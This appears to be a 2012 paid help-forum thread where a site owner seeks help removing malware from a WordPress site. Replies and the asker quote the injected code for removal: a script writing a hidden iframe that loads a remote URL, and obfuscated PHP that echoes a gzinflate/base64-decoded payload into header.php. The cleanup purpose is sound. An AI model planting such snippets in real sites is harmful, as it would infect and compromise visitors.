Warning: Please do not give out any FTP or ssh credentials to anyone, unless you trust them completely. Giving out login details is dangerous.
If the asker does not get an answer then they have 10 days to request a refund.
$15
Wordpress Virus installed onto site, Cannot remove
I have checked index.php files and theme_config etc to no avial. I know these virus' must make use of known a loop-whole and if anyone can help remove the virus it would be much appreciated.
my site is thebuxtedinn.co.uk
Kind Regards
This question has been answered.
smwilson | 07/08/12 at 6:36am
Edit
(5) Possible Answers Submitted...
See a chronological view of answers?
Warning: Please do not give out any FTP or ssh credentials to anyone, unless you trust them completely. Giving out login details is dangerous.
-
Last edited:
07/08/12
6:42amJatin Soni says:I can see your homepge but not other pages. Only one js text is on the header
That may be you need to complete the code.document.write(''); xml:lang="en"> -
Last edited:
07/08/12
6:46am -
Last edited:
07/08/12
6:56amNilesh shiragave says:Hi
Please check your themes all PHP file for virus code. Also check wp-config.php , index.php and wp-app.php file from root folder for virus code.
Thanks -
Last edited:
07/08/12
8:12amAgus Setiawan says:remove this code on header.php ( before <head> code )
<script type="text/javascript">
document.write('<iframe src="http://oxsanasiberians.com/downloads/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script>
------------------
i think there's another code ( maybe in function.php ) that must be removed too. the code will check their code in header, that if removed, the page will not be loaded or error.
with your permission, please send me an access to your dashboard, i'll try to fix this
thank you.
-------------------
i think the site is working fine right now.Previous versions of this answer: 07/08/12 at 7:54am | 07/08/12 at 7:57am | 07/08/12 at 8:12am
- 07/08/12 7:44am
smwilson says:OK, I have removed a script from the header before and it seems to have returned. Although the code was written differently as:
<?php language_attributes();
#c3284d#
echo(gzinflate(base64_decode("JY5BDoIwEEX3JNyhmQ26oYlLpZzCCwztSMdA27SD4O0F2f285P//umIzJ1HyTWRAaBP9xg+eFPq6ctEuMwVp18xCl6bjV8aZVMnWgBdJd63jVjBg4YEyYyitjbN2cQ1TRFd0EZTSJp9Ahb1p4LmyCGVQ+0ucJg6jAVwkgvpPDzE7ygbCDnDiMRiwu8BR8MSjFwM3UCs78UfqO30q9c31UVedPt37Hw==")));
#/c3284d#
?>
Is there a php script which keeps adding code?
Sometimes I can access the homepage othertimes I cannot. So i dont know if the virus is running a script which automatically re-adds something to the header.php but the Javascript appears not to be visible within the header.php rather something else
I have removed this new code but I am worried it will come back.
I can now re-access the homepage however when I try accessing any pages within the navigation bar I get a 404 error page.
Thank you for your help.
- 07/08/12 7:44am
-
Last edited:
07/08/12
7:33am
This question has expired.
Gabriel Reguly, Francisco Javier Carazo Gil, smwilson, Daniel Yoen voted on this question.
Current status of this question: Completed
Warning: Please do not give out any FTP or ssh credentials to anyone, unless you trust them completely. Giving out login details is dangerous.
If the asker does not get an answer then they have 10 days to request a refund.